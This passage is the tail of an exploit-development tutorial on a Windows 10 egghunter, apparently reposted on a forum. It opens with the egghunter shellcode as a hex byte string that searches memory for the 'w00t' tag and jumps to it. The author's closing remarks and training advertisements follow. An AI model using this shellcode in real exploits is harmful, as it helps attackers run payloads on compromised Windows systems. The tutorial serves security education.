"\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7") I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement, and/or able to reduce the size of the egghunter, please don’t hesitate to let me know. (I’ll be waiting for your feedback for a while before adding it to mona). Of course I’d love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32bit systems, older Windows versions, etc). That’s all folks Thanks for reading! I hope you have enjoyed this brand new article and I hope you’re as excited about the future as much as I am. If you would like to hang out, discuss infosec topics, ask question (and answer questions), please sign up to our Slack workspace. To access the workspace: Head over to https://www.facebook.com/corelanconsulting (and like the page while you’re at it). You don’t need a facebook account, the page is public. Scroll through the posts and look for the one that contains the invite link to Slack Register, done. Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts. Corelan Training & Corelan Consulting This article is just a small example of what you’ll learn in our Corelan Bootcamp. If you’d like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don’t hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main form of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
    1 point
This leaderboard is set to Bucharest/GMT+02:00
×
×
  • Create New...